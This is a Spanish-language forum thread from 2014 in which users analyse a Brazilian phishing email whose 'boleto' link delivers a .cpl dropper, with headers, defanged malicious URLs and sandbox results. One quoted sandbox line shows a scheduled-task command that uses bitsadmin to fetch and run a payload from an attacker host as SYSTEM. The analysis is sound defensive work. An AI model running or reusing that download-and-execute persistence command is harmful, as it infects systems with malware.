elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  BoletoSetembro.cpl
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: BoletoSetembro.cpl  (Leído 4,321 veces)
r32
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.297



Ver Perfil WWW
BoletoSetembro.cpl
« en: 2 Septiembre 2014, 20:07 pm »

Este mensaje lo recibí ayer, me resultó curioso y saqué algo de info, aunque de momento solo estático.
 
Aquí el código del mensaje de hotmail:
Código:
x-store-info:4r51+eLowCe79NzwdU2kRwMf1FfZT+JrOrNqUS7nEGaWI7+e07AEo5CA6K8iX7qtKtPv721BY5mo0WEcsdQP8XzOoWHLaYmOuMSRVnhqmiCChEz1ym6wxKg9LOLCqjdzXXpVvv2L+c8=
Authentication-Results: hotmail.com
; spf=fail (sender IP is 50.116.38.78;
identity alignment result is fail and alignment mode is relaxed)
smtp.mailfrom=www-data@uol.com.br; dkim=none (identity alignment result is
pass and alignment mode is relaxed) header.d=hotmail.com
; x-hmca=none
header.id
 
=mixelyx@hotmail.com X-SID-PRA: mixelyx@hotmail.com X-AUTH-Result:
NONE X-SID-Result: NONE X-Message-Status: n:n X-Message-Delivery:
Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02 X-Message-Info:
11chDOWqoTkwsv9Zisdxe0OuIg2e9Xe3+nPJERnQMhzmYY2w30rOUOVECewZibIxiC+Sp79a25TZ8EgdIr1PuKws638wpvvvqx+tQVRiOWS+BlpxQzg0Pla7ooiSB0teFiOpsoADfWGBa6fUznD7FENT6zo2DX3s5DqTQFcmRvssVEAUj+Dna6uAOBGAvm76Bn7hNIBcWaFtIbo+nQTkYPe0nrJZqeZw
Received: from uol.com.br
([50.116.38.78]) by BAY004-MC5F24.hotmail.com
 
with Microsoft SMTPSVC(7.5.7601.22712); Mon, 1 Sep 2014 21:57:04 -0700
Received: by uol.com.br
(Postfix, from userid 33) id 724011483F; Tue, 2 Sep
2014 04:57:04 +0000 (UTC) To: xxxxxxx@hotmail.com Subject: Segue em
anexo boleto referente ao mes de Setembro X-PHP-Originating-Script:
0:top01.php MIME-Version: 1.0 Content-type: text/html; charset=iso-8859-1
From: Financeiro <[color=#FF0000]mixelyx@hotmail.com[/color]> Message-Id: <
20140902045704.724011483F@uol.com.br> Date: Tue, 2 Sep 2014 04:57:04 +0000
(UTC) Return-Path: www-data@uol.com.br X-OriginalArrivalTime: 02 Sep 2014
04:57:04.0984 (UTC) FILETIME=[57427580:01CFC66A] <!DOCTYPE html PUBLIC
"-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta
content="text/html; charset=ISO-8859-1" http-equiv="content-type">
<title></title> </head> <body> <a href="
hxtp://bukhamees.com/highslide/graphics/cav.php
 
"><img style="border: 0px
solid ; width: 957px; height: 561px;" src="
hxtp://apmcity.com/css/visixaia.png
 
" alt=""></a> <p><img src="
hxtp://bit.ly/1ox7vYa
" width="1" height="1" /></p> </body> </html>

VT: https://www.virustotal.com/es/file/1784d146c729adc0586b4ee2b21de295987e47824f549b8e3e3d6dc3d6d21a57/analysis/1409643892/

Al hacer click sobre el texto nos descargará este archivo:

hxtp://bukhamees.com/highslide/graphics/cav.php --> hxtp://www.arnetltd.com/BoletoSetembro.zip

Archivo descomprimido: BoletoSetembro.cpl

Info sobre el dominio:
http://whois.domaintools.com/arnetltd.com
Citar
User ID at Hotmail.com:
USER_ID=mixelyx@hotmail.com

De momento el análisis ha sido algo estático, no tengo el otro sistema donde hago las pruebas a punto y de momento esto es lo que aporto.

Aquí teneis el análisis en Anubis:
https://anubis.iseclab.org/?action=result&task_id=1bf98778208944e7461a0d1e8b5f2ad9e&call=first
Traffic.pcap: https://anubis.iseclab.org/?action=result&task_id=1bf98778208944e7461a0d1e8b5f2ad9e&download=traffic.pcap

Un dato curioso en el análisis de AI:
Citar
"C:\WINDOWS\system32\cmd.exe" /c schtasks /CREATE /SC onstart /TN "Adobe Update" /TR "cmd /c ping -n 900 127.0.0.1 &bitsadmin /transfer My /Download /PRIORITY HIGH hxtp://gerenciador.es/a001.jpg %TEMP%\a001.cpl &%TEMP%\a001.cpl" /ru SYSTEM

Echando un ojo al tráfio de datos se observa como desc arga otro archivo desde el siguiente dominio:
hxtp://gerenciador2015.com.br/

Descargará este otro archivo:
hxtp://gerenciador2015.com.br/a001/bitsadmin.exe

VT: https://www.virustotal.com/es/file/f910f378b99f06b5f936e7dc607d5991c39b676f4f2edcaae35a5d4262573968/analysis/1409701400/ --> 0 / 55
Citar
El archivo ya ha sido analizado
Este archivo ya fue analizado por VirusTotal el 2014-08-27 14:37:08 UTC, it was first analysed by VirusTotal on 2008-09-28 16:46:23 UTC.
Detecciones: 0/55
Puede ver el último análisis o reanalizarlo otra vez ahora.

AI: https://anubis.iseclab.org/?action=result&task_id=14a121b02de6fc494d9cb0d297e9fa0d2

Saludos.
« Última modificación: 3 Septiembre 2014, 01:58 am por r32 » En línea

r32
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.297



Ver Perfil WWW
Re: BoletoSetembro.cpl
« Respuesta #1 en: 5 Septiembre 2014, 18:43 pm »

Envié el archivo "bitsadmin.exe" a Kaspersky Lab para que le echaran un vistazo, no era normal que descargase ese ejecutable.
La respuesta fue que no ven nada raro en el comportamiento de ese ejecutable, pero.....
Si lo descarga es para algo, no? si nos fijamos bien en las funciones que puede llegar a realizar vemos que lo utiliza como túnel, a traves de el, crea un proceso y utiliza las funciones necesarias, veamos que puede hacer.
Si echamos un vistazo a la MSDN vemos todas las funciones que puede llegar a usar:

http://msdn.microsoft.com/en-us/library/aa362813%28v=vs.85%29.aspx

Puede hacer uso de red, listado de archivos, conexión bajo proxy.
Aquí un listado más completo de sus funciones:

http://msdn.microsoft.com/en-us/library/aa362812%28v=vs.85%29.aspx

BITSAdmin Tool segun veo es para win XP, lo podemos descargar en este paquete:

Windows XP Service Pack 2 Support Tools:
Descarga: http://www.microsoft.com/en-us/download/details.aspx?id=18546
D.Directa: http://download.microsoft.com/download/d/3/8/d38066aa-4e37-4ae8-bce3-a4ce662b2024/WindowsXP-KB838079-SupportTools-ENU.exe

Podemos extraerlo con winrar por ejemplo:



Ahora solo tenemos que volver a extraer el contenido del archivo "support.cab" (4.699 KB), aparecerán todos los archivos incluido "bitsadmin.exe".



Vemos que, tanto peso, como hash coinciden, no han tocado para nada ese ejecutable, por eso comentaba lo del puente.
El archivo "BoletoSetembro.cpl" es el que lo controla, aunque aun no he podido probarlo.

Otro archivo que descarga es una dll (Anonymizer.dll), desde aquí:
hxtp://gerenciador2015.com.br/a001/Anonymizer.dll
(SHA256:    6123b093cfdd904db6932e55a3431e70bc0860a2dca4441acd41e699fbc35597)

Otro 0/55:
VT: https://www.virustotal.com/es/file/6123b093cfdd904db6932e55a3431e70bc0860a2dca4441acd41e699fbc35597/analysis/1409937424/

AI: https://anubis.iseclab.org/?action=result&task_id=10be27ac4bb61f4f4d9e7557a9bb888b6

Citar
Processes Created:    
Executable    Command Line
C:\WINDOWS\system32\regsvr32.exe   regsvr32.exe /u /s .\d1.tmp.dll

Realiza muchisimos cambios esta dll.

Saludos.
« Última modificación: 5 Septiembre 2014, 19:39 pm por r32 » En línea

x64core


Desconectado Desconectado

Mensajes: 1.908


Ver Perfil
Re: BoletoSetembro.cpl
« Respuesta #2 en: 7 Septiembre 2014, 23:24 pm »

El archivo bitsadmin.exe es legitimo, malware descargando, 'dropeando' archivos legitimos no es nuevo, lo hacen para
confundir el analisis o para evadir el analisis de algunos Antivirus que paran de analizar cuando verifican algun archivo legitimo
o que este firmado tambien para confundir al usuario.
En línea

r32
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.297



Ver Perfil WWW
Re: BoletoSetembro.cpl
« Respuesta #3 en: 20 Septiembre 2014, 03:25 am »

Han cambiado de estrategia, han subido un geolocalizador de ip´s, tienen su ftp, aqui el paste con los datos:

VT: https://www.virustotal.com/es/file/7f72782d38e79a70111c0d9ab6bb1b73825e10651d46e6d06e356c3cf19910c5/analysis/1411175821/
AI: https://anubis.iseclab.org/?action=result&task_id=1b25f2bb32a44c174adaf3b4046176398&call=first
Traffic: https://anubis.iseclab.org/?action=result&task_id=1b25f2bb32a44c174adaf3b4046176398&download=traffic.pcap
 
Name                         Query Type        Query Result   
geoip.s12.com.br        DNS_TYPE_A      23.246.231.82
 
FTP: xftp://geoip.s12.com.br

http://pastebin.com/rTWPZ24q

A ver que sorpresita esconde, aun no he mirado del todo.
En línea

r32
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.297



Ver Perfil WWW
Re: BoletoSetembro.cpl
« Respuesta #4 en: 23 Septiembre 2014, 21:13 pm »

Otro intento....

Segue em anexo a 2 via do boleto, Dpto Juridico.


Paste: http://pastebin.com/tQjzEtqT

Luego subo más.

Saludos.
« Última modificación: 27 Septiembre 2014, 00:22 am por r32 » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines